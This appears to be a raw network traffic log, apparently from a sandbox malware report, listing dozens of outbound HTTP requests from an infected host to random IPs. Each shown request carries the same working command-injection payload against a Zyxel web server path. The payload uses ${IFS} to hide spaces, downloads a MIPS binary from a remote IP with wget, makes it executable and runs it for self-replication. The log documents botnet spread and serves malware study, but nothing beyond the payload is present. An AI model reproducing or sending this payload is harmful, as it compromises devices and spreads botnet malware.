                                              Jan 29, 2024 07:03:45.929668903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3390192.168.2.1451028115.135.182.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929689884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3391192.168.2.145037265.134.161.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929754972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3392192.168.2.1456708172.245.177.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929790020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3393192.168.2.144749054.66.178.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929841042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3394192.168.2.1437186196.184.184.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929866076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3395192.168.2.1449532183.193.211.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929928064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3396192.168.2.1434992101.167.172.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.929948092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3397192.168.2.14542744.178.212.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930002928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3398192.168.2.1452920109.254.155.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930030107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3399192.168.2.1443500167.33.245.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930062056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3400192.168.2.1454836192.193.129.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930115938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3401192.168.2.144405042.57.240.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930161953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3402192.168.2.146033866.255.109.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930193901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3403192.168.2.14395284.32.51.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930234909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3404192.168.2.1438014111.239.31.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930264950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3405192.168.2.143971241.178.17.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930314064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3406192.168.2.144763676.8.246.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930340052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3407192.168.2.143408277.38.190.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930351019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3408192.168.2.145780423.252.177.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930406094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3409192.168.2.144414618.59.201.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930444956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3410192.168.2.144701619.208.110.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930469036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3411192.168.2.1441514165.158.70.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930519104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3412192.168.2.143391476.52.91.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930547953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3413192.168.2.1435600202.205.222.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930597067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3414192.168.2.1458062109.198.18.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930645943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3415192.168.2.1457630186.97.104.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930689096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3416192.168.2.143885486.190.85.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930711985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3417192.168.2.1457482129.227.180.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930759907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3418192.168.2.144417476.178.70.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930795908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3419192.168.2.1445624136.51.146.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930845022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3420192.168.2.143473420.199.75.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930900097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3421192.168.2.145573850.53.73.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930946112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3422192.168.2.145899091.11.2.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.930974007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3423192.168.2.143724440.9.4.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931058884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3424192.168.2.1443708172.248.47.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931078911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3425192.168.2.145141685.135.124.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931118965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3426192.168.2.1440672109.60.47.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931140900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3427192.168.2.1441038150.57.92.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931171894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3428192.168.2.145122275.66.80.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931215048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3429192.168.2.143820489.3.241.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931245089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3430192.168.2.144996876.159.138.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931293011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3431192.168.2.1452092205.119.67.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931322098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3432192.168.2.1434498142.173.33.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931370974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3433192.168.2.1443916211.155.217.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931396008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3434192.168.2.1450976121.200.85.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931427956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3435192.168.2.1442276220.75.199.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931476116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3436192.168.2.1455516138.225.216.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931502104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3437192.168.2.1440904196.246.4.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931543112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3438192.168.2.145267690.210.14.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931572914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3439192.168.2.1446314155.214.127.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931627035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3440192.168.2.1449218164.48.106.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931684971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3441192.168.2.144801832.3.73.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931695938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3442192.168.2.144253068.251.107.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931742907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3443192.168.2.143333092.19.237.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931768894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3444192.168.2.1453882103.88.80.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931798935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3445192.168.2.143772296.50.151.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931859016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3446192.168.2.1458472206.208.13.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931873083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3447192.168.2.143947466.57.31.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931899071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3448192.168.2.1445540211.130.4.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931952953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3449192.168.2.1442366191.121.152.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.931979895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3450192.168.2.145420425.211.65.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932018042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3451192.168.2.144885853.213.9.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932049990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3452192.168.2.1438368147.107.16.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:45.932099104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3453192.168.2.1457346137.38.62.201443
                                              TimestampBytes transferredDirectionData
